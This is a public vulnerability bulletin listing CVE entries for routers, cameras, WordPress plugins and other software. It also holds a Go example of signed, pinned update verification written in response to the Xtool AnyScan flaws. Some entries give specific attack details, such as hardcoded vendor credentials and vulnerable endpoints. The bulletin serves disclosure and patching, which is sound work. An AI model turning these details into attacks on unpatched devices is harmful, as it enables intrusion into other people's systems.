| SDMC--NE6037 | Firmware in SDMC NE6037 routers prior to version 7.1.12.2.44 has a network diagnostics tool vulnerable to shell command injection attacks. In order to exploit this vulnerability, an attacker has to log in to the router's administrative portal, which by default is reachable only via LAN ports. | 2025-11-27 | not yet calculated | CVE-2025-8890 | https://cert.pl/en/posts/2025/11/CVE-2025-8890 |
| shama--willitmerge | willitmerge is a command line tool to check if pull requests are mergeable. In versions 0.2.1 and prior, there is a command Injection vulnerability in willitmerge. The vulnerability manifests in this package due to the use of insecure child process execution API (exec) to which it concatenates user input, whether provided to the command-line flag, or is in user control in the target repository. At time of publication, no known fix is public. | 2025-11-29 | not yet calculated | CVE-2025-66219 | https://github.com/shama/willitmerge/security/advisories/GHSA-j9wj-m24m-7jj6 https://github.com/shama/willitmerge/blob/2fe91d05191fb05ac6da685828d109a3a5885028/lib/willitmerge.js#L189-L197 |
| Shenzhen TVT Digital Technology Co., Ltd.--NVMS-9000 | Shenzhen TVT Digital Technology Co., Ltd. NVMS-9000 firmware (used by many white-labeled DVR/NVR/IPC products) contains hardcoded API credentials and an OS command injection flaw in its configuration services. The web/API interface accepts HTTP/XML requests authenticated with a fixed vendor credential string and passes user-controlled fields into shell execution contexts without proper argument sanitization. An unauthenticated remote attacker can leverage the hard-coded credential to access endpoints such as /editBlackAndWhiteList and inject shell metacharacters inside XML parameters, resulting in arbitrary command execution as root. The same vulnerable backend is also reachable in some models through a proprietary TCP service on port 4567 that accepts a magic GUID preface and base64-encoded XML, enabling the same command injection sink. Firmware releases from mid-February 2018 and later are reported to have addressed this issue. Exploitation evidence was observed by the Shadowserver Foundation on 2025-01-28 UTC. | 2025-11-24 | not yet calculated | CVE-2018-25126 | https://web.archive.org/web/20180614014914/http://en.tvt.net.cn:80/news/227.html https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://qkl.seebug.org/vuldb/ssvid-97217 https://blogs.juniper.net/en-us/threat-research/iot-botnet-exploiting-tvt-shenzhen-dvrs-still-lingers https://www.vulncheck.com/advisories/tvt-nvms9000-hardcoded-api-credentials-and-command-injection |
| Shenzhen TVT Digital Technology Co., Ltd.--NVMS-9000 | Shenzhen TVT Digital Technology Co., Ltd. NVMS-9000 firmware (used by many white-labeled DVR/NVR/IPC products) versions prior to 1.3.4 contain an authentication bypass in the NVMS-9000 control protocol. By sending a single crafted TCP payload to an exposed NVMS-9000 control port, an unauthenticated remote attacker can invoke privileged administrative query commands without valid credentials. Successful exploitation discloses sensitive information including administrator usernames and passwords in cleartext, network and service configuration, and other device details via commands such as queryBasicCfg, queryUserList, queryEmailCfg, queryPPPoECfg, and queryFTPCfg. | 2025-11-24 | not yet calculated | CVE-2024-14007 | https://ssd-disclosure.com/ssd-advisory-nvms9000-information-disclosure/ https://www.greynoise.io/blog/surge-exploitation-attempts-tvt-dvrs https://undercodetesting.com/eleven11-botnet-mirai-variant-targeting-nvms-9000-devices/ https://www.vulncheck.com/advisories/tvt-nvms9000-unauthenticated-admin-queries-and-information-disclosure |
| SIGB PBP--SIGB | SIGB PMB v8.0.1.14 was discovered to contain multiple SQL injection vulnerabilities in the /opac_css/ajax_selector.php component via the id and datas parameters. | 2025-11-25 | not yet calculated | CVE-2025-61167 | http://pmb.com http://sigb.com https://forge.sigb.net/projects/pmb/wiki/Changelog_801#S%C3%A9curit%C3%A9-2 https://gist.github.com/ZanyMonk/ed12e265f777152c33aeb806a644850e |
| SIGB PBP--SIGB | An issue in the cms_rest.php component of SIGB PMB v8.0.1.14 allows attackers to execute arbitrary code via unserializing an arbitrary file. | 2025-11-25 | not yet calculated | CVE-2025-61168 | http://pmb.com http://sigb.com https://gist.github.com/ZanyMonk/446f6875a2ceb3decef5ff1176428f9e https://forge.sigb.net/projects/pmb/wiki/Changelog_801#S%C3%A9curit%C3%A9-2 |
| Simple SA--Wirtualna Uczelnia | The application contains an insecure 'redirectToUrl' mechanism that incorrectly processes the value of the 'redirectUrlParameter' parameter. The application interprets the entered string of characters as a Java expression, allowing an unauthenticated attacker to perform arbitrary code execution. This issue was fixed in version wu#2016.1.5513#0#20251014_113353. | 2025-11-27 | not yet calculated | CVE-2025-12140 | https://cert.pl/posts/2025/11/CVE-2025-12140/ |
| SiRcom--SMART Alert (SiSA) | SiRcom SMART Alert (SiSA) allows unauthorized access to backend APIs. This allows an unauthenticated attacker to bypass the login screen using browser developer tools, gaining access to restricted parts of the application. | 2025-11-25 | not yet calculated | CVE-2025-13483 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-06 |
| SOGo--alinto | alinto SOGo 5.12.3 is vulnerable to Cross Site Scripting (XSS) via the "userName" parameter. | 2025-11-24 | not yet calculated | CVE-2025-63498 | https://github.com/Alinto/sogo/commit/9e20190fad1a437f7e1307f0adcfe19a8d45184c https://github.com/xryptoh/CVE-2025-63498 https://github.com/Alinto/sogo/releases/tag/SOGo-5.12.4 |
| Sony Corporation--SNC-CX600W | Cross-site request forgery vulnerability exists in SNC-CX600W versions prior to Ver.2.8.0. If a user accesses a specially crafted webpage while logged in, unintended operations may be performed. | 2025-11-25 | not yet calculated | CVE-2025-62497 | https://www.sony.com/electronics/support/ip-cameras-fixed/snc-cx600w https://jvn.jp/en/jp/JVN75140384/ |
| Sony Corporation--SNC-CX600W | Cross-site scripting vulnerability exists in SNC-CX600W all versions. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the product. | 2025-11-25 | not yet calculated | CVE-2025-64730 | https://www.sony.com/electronics/support/ip-cameras-fixed/snc-cx600w https://jvn.jp/en/jp/JVN75140384/ |
| SwitchBot--Smart Video Doorbell | Smart Video Doorbell firmware versions prior to 2.01.078 contain an active debug code vulnerability that allows an attacker to connect via Telnet and gain access to the device. | 2025-11-26 | not yet calculated | CVE-2025-64983 | https://www.switch-bot.com/products/switchbot-video-doorbell?srsltid=AfmBOooGEZArqUag9p59qB8ti2fDP0vCOzxX33NGlpJ8yDlZnzC3vJ_f https://jvn.jp/en/jp/JVN67185535 |
| SY-GPON-1110-WDONT--Syrotech | An issue was discovered in Syrotech SY-GPON-1110-WDONT SYRO_3.7L_3.1.02-240517 allowing attackers to extract the SSL Private Key, CA Certificate, SSL Certificate, and Client Certificates in .pem format from the etc folder in the firmware. | 2025-11-25 | not yet calculated | CVE-2025-63729 | https://github.com/Yashodhanvivek/CVE-2025-63729-Syrotech-SY-GPON-1110-/blob/main/Syrotech_SY-GPON-1110-WDONT_Security_Assessment.pdf |
| Synergetic Data Systems, Inc.--UnForm Server | UnForm Server versions < 10.1.15 contain an unauthenticated arbitrary file read and SMB coercion vulnerability in the Doc Flow feature's 'arc' endpoint. The Doc Flow module uses the 'arc' handler to retrieve and render pages or resources specified by the user-supplied 'pp' parameter, but it does so without enforcing authentication or restricting path inputs. As a result, an unauthenticated remote attacker can supply local filesystem paths to read arbitrary files accessible to the service account. On Windows deployments, providing a UNC path can also coerce the server into initiating outbound SMB authentication, potentially exposing NTLM credentials for offline cracking or relay. This issue may lead to sensitive information disclosure and, in some environments, enable further lateral movement. | 2025-11-25 | not yet calculated | CVE-2025-34350 | https://unform.com/download/uf101_readme.txt https://www.vulncheck.com/advisories/unform-server-doc-flow-unauthenticated-file-read |
| System USSD Gateway--OpenCode | OpenCode Systems USSD Gateway OC Release: 5 Version 6.13.11 was discovered to contain a SQL injection vulnerability via the ID parameter in the getSubUsersByProvider function. | 2025-11-26 | not yet calculated | CVE-2025-65235 | https://eslam3kl.gitbook.io https://github.com/eslam3kl https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65235-ussd-gw-sql-injection-subusers |
| System USSD Gateway--OpenCode | OpenCode Systems USSD Gateway OC Release: 5 was discovered to contain a SQL injection vulnerability via the Session ID parameter in the /occontrolpanel/index.php endpoint. | 2025-11-26 | not yet calculated | CVE-2025-65236 | https://eslam3kl.gitbook.io https://github.com/eslam3kl https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65236-ussd-gateway-sql-injection-sessions |
| System USSD Gateway--OpenCode | A reflected cross-site scripting (XSS) vulnerability in OpenCode Systems USSD Gateway OC Release: 5 allows attackers to execute arbitrary JavaScript in the context of a user's browser via injecting a crafted payload. | 2025-11-26 | not yet calculated | CVE-2025-65237 | https://eslam3kl.gitbook.io https://github.com/eslam3kl https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65237-ussd-gateway-reflected-cross-site-scripting |
| System USSD Gateway--OpenCode | Incorrect access control in the getSubUsersByProvider function of OpenCode Systems USSD Gateway OC Release: 5 Version 6.13.11 allows attackers with low-level privileges to dump user records and access sensitive information. | 2025-11-26 | not yet calculated | CVE-2025-65238 | https://eslam3kl.gitbook.io https://github.com/eslam3kl https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65238-ussd-gateway-broken-access-control-sessions |
| System USSD Gateway--OpenCode | Incorrect access control in the /aux1/ocussd/trace endpoint of OpenCode Systems USSD Gateway OC Release:5, version 6.13.11 allows attackers with low-level privileges to read server logs. | 2025-11-26 | not yet calculated | CVE-2025-65239 | https://eslam3kl.gitbook.io https://github.com/eslam3kl https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65239-ussd-gateway-broken-access-control-logs |
| Taclia--Taclia's web application | Stored Cross-Site Scripting (XSS) vulnerability in the Taclia web application, where uploaded SVG images are not properly sanitized. This allows attackers to embed malicious scripts in SVG files such as profile images, which are then stored on the server and executed in the context of any user who accesses the compromised resource. | 2025-11-24 | not yet calculated | CVE-2025-41087 | https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-xss-stored-taclias-web-application |
| Tellion, Inc.--HN-2204AP Router | Tellion HN-2204AP routers contain an unauthenticated configuration disclosure vulnerability in the /cgi-bin/system_config_file management endpoint. The endpoint allows remote retrieval of a compressed configuration archive without requiring authentication or authorization. The exposed configuration may include administrative credentials, wireless keys, and other sensitive settings, enabling an unauthenticated attacker to obtain information that can facilitate further compromise of the device or network. | 2025-11-26 | not yet calculated | CVE-2019-25227 | https://packetstorm.news/files/id/154752/ https://web.archive.org/web/20190525010559/https://www.tellion.com/ https://www.vulncheck.com/advisories/tellion-hn2204ap-unauthenticated-config-disclosure |
| TEW-657BRM--TRENDnet | TRENDnet TEW-657BRM 1.00.1 has an authenticated remote OS command injection vulnerability in the setup.cgi binary, exploitable via the HTTP parameters "command", "todo", and "next_file", which allows an attacker to execute arbitrary commands with root privileges. | 2025-11-26 | not yet calculated | CVE-2025-65202 | https://github.com/WhereisRain/TEW-657BRM |
| The Ray Team--Anyscale Ray | Anyscale Ray 2.52.0 contains an insecure default configuration in which token-based authentication for Ray management interfaces (including the dashboard and Jobs API) is disabled unless explicitly enabled by setting RAY_AUTH_MODE=token. In the default unauthenticated state, a remote attacker with network access to these interfaces can submit jobs and execute arbitrary code on the Ray cluster. NOTE: The vendor plans to enable token authentication by default in a future release. They recommend enabling token authentication to protect your cluster from unauthorized access. | 2025-11-27 | not yet calculated | CVE-2025-34351 | https://docs.ray.io/en/latest/ray-security/token-auth.html https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-w8vc-465m-jjw6 https://www.vulncheck.com/advisories/anyscale-ray-token-authentication-disabled-by-default-insecure-configuration |
| thingsboard--thingsboard | ThingsBoard in versions prior to v4.2.1 allows an authenticated user to upload malicious SVG images via the "Image Gallery", leading to a Stored Cross-Site Scripting (XSS) vulnerability. The exploit can be triggered when any user accesses the public API endpoint of the malicious SVG images, or if the malicious images are embedded in an `iframe` element, during a widget creation, deployed to any page of the platform (e.g., dashboards), and accessed during normal operations. The vulnerability resides in the `ImageController`, which fails to restrict the execution of JavaScript code when an image is loaded by the user's browser. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. | 2025-11-27 | not yet calculated | CVE-2025-3261 | https://advisory.checkmarx.net/advisory/CVE-2025-3261/ https://github.com/thingsboard/thingsboard/commit/b2ae6f92d12206ea185a2e882945a6b69234bf03 |
| TIMLEGGE--XML::Sig | XML-Sig versions 0.27 through 0.67 for Perl incorrectly validates XML files if signatures are omitted. An attacker can remove the signature from the XML document to make it pass the verification check. XML-Sig is a Perl module to validate signatures on XML files. An unsigned XML file should return an error message. The affected versions return true when attempting to validate an XML file that contains no signatures. | 2025-11-26 | not yet calculated | CVE-2025-40934 | https://github.com/perl-net-saml2/perl-XML-Sig/issues/63 https://github.com/perl-net-saml2/perl-XML-Sig/pull/64 |
| Tinyproxy--Tinyproxy | Tinyproxy through 1.11.2 contains an integer overflow vulnerability in the strip_return_port() function within src/reqs.c. | 2025-11-26 | not yet calculated | CVE-2025-63938 | https://github.com/tinyproxy/tinyproxy/issues/586 https://github.com/tinyproxy/tinyproxy/commit/3c0fde94981b025271ffa1788ae425257841bf5a https://github.com/rayinaw/my-hub/blob/main/CVE-2025-63938/DISCLOSURE.md |
| Tuya Smart--Tuya | Cross-Site Request Forgery (CSRF) vulnerability in the OAuth implementation of the Tuya SDK 6.5.0 for Android and iOS, affects the Tuya Smart and Smartlife mobile applications, as well as other third-party applications that integrate the SDK, allows an attacker to link their own Amazon Alexa account to a victim's Tuya account. The applications fail to validate the OAuth state parameter during the account linking flow, enabling a cross-site request forgery (CSRF)-like attack. By tricking the victim into clicking a crafted authorization link, an attacker can complete the OAuth flow on the victim's behalf, resulting in unauthorized Alexa access to the victim's Tuya-connected devices. This affects users regardless of prior Alexa linkage and does not require the Tuya application to be active at the time. Successful exploitation may allow remote control of devices such as cameras, doorbells, door locks, or alarms. | 2025-11-24 | not yet calculated | CVE-2025-56400 | http://tuya.com https://src.tuya.com/announcement/30 |
| Ubuntu--edk2 | The Ubuntu edk2 UEFI firmware packages accidentally allowed the UEFI Shell to be accessed in Secure Boot environments, possibly allowing bypass of Secure Boot constraints. Versions 2024.05-2ubuntu0.3 and 2024.02-2ubuntu0.3 disable the Shell. Some previous versions inserted a secure-boot-based decision to continue running inside the Shell itself, which is believed to be sufficient to enforce Secure Boot restrictions. This is an additional repair on top of the incomplete fix for CVE-2023-48733. | 2025-11-26 | not yet calculated | CVE-2025-2486 | https://bugs.launchpad.net/ubuntu/+source/edk2/+bug/2101797 |
| Unknown--Backup Migration | The Backup Migration WordPress plugin before 2.0.0 does not properly generate its backup path in certain server configurations, allowing unauthenticated users to fetch a log that discloses the backup filename. The backup archive is then downloadable without authentication. | 2025-11-24 | not yet calculated | CVE-2025-12394 | https://wpscan.com/vulnerability/e61293d0-2e1b-4dac-96c5-97fa17e38b16/ |
| Unknown--Broken Link Manager | The Broken Link Manager WordPress plugin through 0.6.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-11-24 | not yet calculated | CVE-2025-12629 | https://wpscan.com/vulnerability/528e9775-3a2d-4e52-92f7-f123ad787e7d/ |
| Unknown--Guest posting / Frontend Posting / Front Editor | The Guest posting / Frontend Posting / Front Editor WordPress plugin before 5.0.0 does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue. | 2025-11-24 | not yet calculated | CVE-2025-12569 | https://wpscan.com/vulnerability/37586572-33f9-4365-bfce-7db277a8df72/ |
| Unknown--TAX SERVICE Electronic HDM | The TAX SERVICE Electronic HDM WordPress plugin before 1.2.1 does not perform authorization and CSRF checks in an AJAX action, allowing unauthenticated users to import and execute arbitrary SQL statements. | 2025-11-26 | not yet calculated | CVE-2025-12061 | https://wpscan.com/vulnerability/1015dd69-faa5-4008-8884-f497ff980ed3/ |
| Unknown--WordPress eCommerce Plugin | The WordPress eCommerce Plugin WordPress plugin through 2.9.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-11-24 | not yet calculated | CVE-2024-14015 | https://wpscan.com/vulnerability/1a70927a-e345-4e2f-98da-1235f4482cc0/ |
| Unknown--WP 2FA | The WP 2FA WordPress plugin does not generate backup codes with enough entropy, which could allow attackers to bypass the second factor by brute forcing them. | 2025-11-24 | not yet calculated | CVE-2025-12628 | https://wpscan.com/vulnerability/5e2d033c-dde6-4774-8588-cbe268c0d797/ |
| Veal98 echo--ECHO | An issue was discovered in Veal98 Echo Open-Source Community System 2.2 through 2.3 allowing an unauthenticated attacker to cause the server to send email verification messages to arbitrary users via the /sendEmailCodeForResetPwd endpoint, potentially causing a denial of service to the server or the downstream users. | 2025-11-25 | not yet calculated | CVE-2025-51741 | http://echo.com https://github.com/Veal98/Echo https://gist.github.com/Paxsizy/9d92e8746778cf0926705d89b4f3618c |
| xmall--xmall | Multiple Cross-Site Scripting (XSS) vulnerabilities exist in xmall v1.1 due to improper handling of user-supplied data. User input fields such as username and description are directly rendered into HTML without proper sanitization or encoding, allowing attackers to inject and execute malicious scripts. | 2025-11-29 | not yet calculated | CVE-2025-65540 | https://github.com/Exrick/xmall/issues/101 |
| Xtool AnyScan--Xtooltech | Xtooltech Xtool AnyScan Android Application 4.40.40 and prior is Missing SSL Certificate Validation. The application fails to properly validate the TLS certificate from its update server. An attacker on the same network can exploit this vulnerability by performing a Man-in-the-Middle (MITM) attack to intercept, decrypt, and modify traffic between the application and the update server. This serves as the basis for further attacks, including Remote Code Execution. | 2025-11-24 | not yet calculated | CVE-2025-63432 | https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/ https://github.com/ab3lson/cve-references/tree/master/CVE-2025-63432 |
| Xtool AnyScan--Xtooltech | Xtooltech Xtool AnyScan Android Application 4.40.40 and prior uses a hardcoded cryptographic key and IV to decrypt update metadata. The key is stored as a static value within the application's code. An attacker with the ability to intercept network traffic can use this hardcoded key to decrypt, modify, and re-encrypt the update manifest, allowing them to direct the application to download a malicious update package. | 2025-11-24 | not yet calculated | CVE-2025-63433 | https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/ https://github.com/ab3lson/cve-references/tree/master/CVE-2025-63433 |
| Xtool AnyScan--Xtooltech | The update mechanism in Xtooltech Xtool AnyScan Android Application 4.40.40 and prior is insecure. The application downloads and extracts update packages containing executable code without performing a cryptographic integrity or authenticity check on their contents. An attacker who can control the update metadata can serve a malicious package, which the application will accept, extract, and later execute, leading to arbitrary code execution. | 2025-11-24 | not yet calculated | CVE-2025-63434 | https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/ https://github.com/ab3lson/cve-references/tree/master/CVE-2025-63434 |
| Xtool AnyScan--Xtooltech | Xtooltech Xtool AnyScan Android Application 4.40.40 is Missing Authentication for Critical Function. The server-side endpoint responsible for serving update packages for the application does not require any authentication. This allows an unauthenticated remote attacker to freely download official update packages. | 2025-11-24 | not yet calculated | CVE-2025-63435 | https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/ https://github.com/ab3lson/cve-references/tree/master/CVE-2025-63435 |
| YCCMS 3.4--YCCMS | YCCMS 3.4 contains a stored cross-site scripting (XSS) vulnerability in the article management functionality. The vulnerability exists in the add() and getPost() functions within the ArticleAction.class.php file due to improper neutralization of user input in the article title field. | 2025-11-24 | not yet calculated | CVE-2025-64048 | http://yccms.com https://gist.github.com/b1uel0n3/8354650e683ffb0812bfe72b702b482d |
| youlai-boot v2.21--youlai | Incorrect access control in youlai-boot v2.21.1 allows attackers to escalate privileges and access the Administrator backend. | 2025-11-26 | not yet calculated | CVE-2025-55469 | https://gitee.com/youlaiorg/youlai-boot/issues/ICFCOK https://gitee.com/youlaiorg/youlai-boot https://gist.github.com/old6ma/d6e19c9efbe28431f4c27c063cc9cbb8 |
| youlai-boot v2.21--youlai | Incorrect access control in the getUserFormData function of youlai-boot v2.21.1 allows attackers to access sensitive information for other users. | 2025-11-26 | not yet calculated | CVE-2025-55471 | https://gitee.com/youlaiorg/youlai-boot https://gitee.com/youlaiorg/youlai-boot/issues/ICFBW8 https://gist.github.com/old6ma/08d83e5aa7d47e7ff18b23337ccd1f1d |
| ZIRA Group WBRM 7.0--Zira Group | ZIRA Group WBRM 7.0 is vulnerable to SQL Injection in referenceLookupsByTableNameAndColumnName. | 2025-11-24 | not yet calculated | CVE-2025-56401 | http://wbrm.com https://mstreet97.github.io/security/cve/sqli/2025/07/25/Zira-WBRM-SQL-Injection-CVE-2025-56401.html |
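The four Xtool AnyScan entries above (CVE-2025-63432 through CVE-2025-63435) describe one update chain with every link missing: no TLS certificate validation toward the update server, a key and IV hardcoded in the app to "protect" the manifest, and no integrity or authenticity check on the package before it is extracted and executed. The Go program below is an added example, written for this page and not code from Xtooltech or from the NowSecure write-up, showing what those missing checks look like when done properly: a detached Ed25519 signature over the manifest, the package's SHA-256 digest carried inside the signed manifest, and an HTTPS client that keeps chain validation on and additionally pins the update server's SPKI hash. The key pair, manifest fields, version string, URL and package bytes are all constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"crypto/tls"
	"crypto/x509"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
	"net/http"
)

// Manifest is the update metadata the client fetches. Everything the client
// acts on (download URL, expected digest) lives inside the signed bytes.
type Manifest struct {
	Version string `json:"version"`
	URL     string `json:"url"`
	SHA256  string `json:"sha256"` // hex SHA-256 of the package bytes
}

// SignedManifest carries the manifest exactly as signed plus a detached signature.
type SignedManifest struct {
	Manifest  []byte
	Signature []byte
}

// GenerateKeypair is the publisher's one-time setup. The private key stays on the
// signing host; only the public key ships in the app, and it lets nobody forge anything.
func GenerateKeypair() (ed25519.PublicKey, ed25519.PrivateKey, error) {
	return ed25519.GenerateKey(rand.Reader)
}

// PackageDigest is the hex SHA-256 the publisher writes into the manifest.
func PackageDigest(pkg []byte) string {
	sum := sha256.Sum256(pkg)
	return hex.EncodeToString(sum[:])
}

// SignManifest runs on the publisher side and binds version, URL and digest together.
func SignManifest(priv ed25519.PrivateKey, m Manifest) (SignedManifest, error) {
	body, err := json.Marshal(m)
	if err != nil {
		return SignedManifest{}, err
	}
	return SignedManifest{Manifest: body, Signature: ed25519.Sign(priv, body)}, nil
}

// VerifyUpdate is the client side: the manifest is trusted only after its signature
// verifies under the pinned public key, and the package only after its digest matches
// the signed manifest. Nothing is extracted or run before both checks pass.
func VerifyUpdate(pub ed25519.PublicKey, sm SignedManifest, pkg []byte) (Manifest, error) {
	if len(pub) != ed25519.PublicKeySize || !ed25519.Verify(pub, sm.Manifest, sm.Signature) {
		return Manifest{}, errors.New("update manifest: bad signature")
	}
	var m Manifest
	if err := json.Unmarshal(sm.Manifest, &m); err != nil {
		return Manifest{}, fmt.Errorf("update manifest: %w", err)
	}
	want, err := hex.DecodeString(m.SHA256)
	if err != nil || len(want) != sha256.Size {
		return Manifest{}, errors.New("update manifest: malformed digest")
	}
	got := sha256.Sum256(pkg)
	if !bytes.Equal(got[:], want) {
		return Manifest{}, errors.New("update package: digest mismatch")
	}
	return m, nil
}

// NewUpdateClient keeps normal certificate chain validation on (InsecureSkipVerify stays
// false) and additionally pins the SPKI hash of the update server's leaf certificate,
// so a MITM presenting any other certificate fails the handshake.
func NewUpdateClient(spkiPin [sha256.Size]byte) *http.Client {
	cfg := &tls.Config{
		MinVersion: tls.VersionTLS12,
		VerifyPeerCertificate: func(_ [][]byte, chains [][]*x509.Certificate) error {
			if sha256.Sum256(chains[0][0].RawSubjectPublicKeyInfo) != spkiPin {
				return errors.New("update server: certificate pin mismatch")
			}
			return nil
		},
	}
	return &http.Client{Transport: &http.Transport{TLSClientConfig: cfg}}
}

func main() {
	pub, priv, err := GenerateKeypair()
	if err != nil {
		panic(err)
	}
	pkg := []byte("constructed update package bytes") // stand-in for the real archive
	sm, _ := SignManifest(priv, Manifest{Version: "4.40.41", URL: "https://updates.example/app.zip", SHA256: PackageDigest(pkg)})
	_, err = VerifyUpdate(pub, sm, pkg)
	fmt.Println("genuine package:", err) // <nil>
	_, err = VerifyUpdate(pub, sm, []byte("attacker-swapped package"))
	fmt.Println("swapped package:", err) // update package: digest mismatch
	edited := SignedManifest{Manifest: bytes.Replace(sm.Manifest, []byte("4.40.41"), []byte("9.9.9"), 1), Signature: sm.Signature}
	_, err = VerifyUpdate(pub, edited, pkg)
	fmt.Println("edited manifest:", err) // update manifest: bad signature
}
```

The design point behind the example: encrypting the manifest with a key that ships inside the APK (the pattern in CVE-2025-63433) adds no authenticity, because anyone who unpacks the app has the key and can re-encrypt whatever they like. Only a signature under a private key that never leaves the publisher lets the client reject a manifest it did not author, and only a digest inside that signed manifest ties the downloaded package to it.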
Vulnerability Summary for the Week of November 17, 2025
Posted on Monday November 24, 2025
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| ABB--ABB Ability Edgenius | Authentication Bypass Using an Alternate Path or Channel vulnerability in ABB ABB Ability Edgenius. This issue affects ABB Ability Edgenius: 3.2.0.0, 3.2.1.1. | 2025-11-20 | 9.6 | CVE-2025-10571 | https://search.abb.com/library/Download.aspx?DocumentID=7PAA022088&LanguageCode=en&DocumentPartId=&Action=Launch |
| AMD--AMD StoreMI | A DLL hijacking vulnerability in AMD StoreMI™ could allow an attacker to achieve privilege escalation, potentially resulting in arbitrary code execution. | 2025-11-23 | 7.3 | CVE-2024-21922 | https://www.amd.com/en/resources/product-security/bulletin/amd-sb-4010.html |
| AMD--AMD StoreMI | Incorrect default permissions in AMD StoreMI™ could allow an attacker to achieve privilege escalation, potentially resulting in arbitrary code execution. | 2025-11-23 | 7.3 | CVE-2024-21923 | https://www.amd.com/en/resources/product-security/bulletin/amd-sb-4010.html |
| appsbd--Vitepos Point of Sale (POS) for WooCommerce | The Vitepos - Point of Sale (POS) for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the insert_media_attachment() function in all versions up to, and including, 3.3.0. This is due to the save_update_category_img() function accepting user-supplied file types without validation when processing category images. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which makes remote code execution possible. | 2025-11-21 | 8.8 | CVE-2025-13156 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bd478bb7-f0d7-4a29-8236-96ad69b5ae67?source=cve https://plugins.trac.wordpress.org/changeset/3398044   |
| Broadcom--BCM5820X | A privilege escalation vulnerability exists in the ControlVault WBDI Driver WBIO_USH_ADD_RECORD functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to privilege escalation. An attacker can issue an API call to trigger this vulnerability. | 2025-11-17 | 8.7 | CVE-2025-31361 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2174 |
| Broadcom--BCM5820X | A hard-coded password vulnerability exists in the ControlVault WBDI Driver functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted ControlVault API call can lead to execution of a privileged operation. An attacker can issue an API call to trigger this vulnerability. | 2025-11-17 | 8.7 | CVE-2025-31649 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2173 |
| Broadcom--BCM5820X | A buffer overflow vulnerability exists in the CvManager_SBI functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted ControlVault API call can lead to arbitrary code execution. An attacker can issue an API call to trigger this vulnerability. | 2025-11-17 | 8.8 | CVE-2025-32089 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2188 |
| Broadcom--BCM5820X | A buffer overflow vulnerability exists in the CvManager functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted ControlVault API call can lead to memory corruption. An attacker can issue an API call to trigger this vulnerability. | 2025-11-17 | 8.8 | CVE-2025-36553 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2189 |
| Broadcom--BCM5820X | Multiple out-of-bounds read and write vulnerabilities exist in the ControlVault WBDI Driver Broadcom Storage Adapter functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to memory corruption. An attacker can issue an API call to trigger this vulnerability. This vulnerability is triggered when submitting a `WinBioControlUnit` call to the StorageAdapter with ControlCode 2 (`WBIO_USH_GET_IDENTITY`) and an improper `ReceiveBufferSize` value. | 2025-11-17 | 7.3 | CVE-2025-36460 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2175 |
| Broadcom--BCM5820X | Multiple out-of-bounds read and write vulnerabilities exist in the ControlVault WBDI Driver Broadcom Storage Adapter functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to memory corruption. An attacker can issue an API call to trigger this vulnerability. This vulnerability is triggered when submitting a `WinBioControlUnit` call to the StorageAdapter with ControlCode 0 (`WBIO_USH_GET_TEMPLATE`) and an invalid `ReceiveBufferSize` and/or an invalid `SendBufferSize`. | 2025-11-17 | 7.3 | CVE-2025-36461 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2175 |
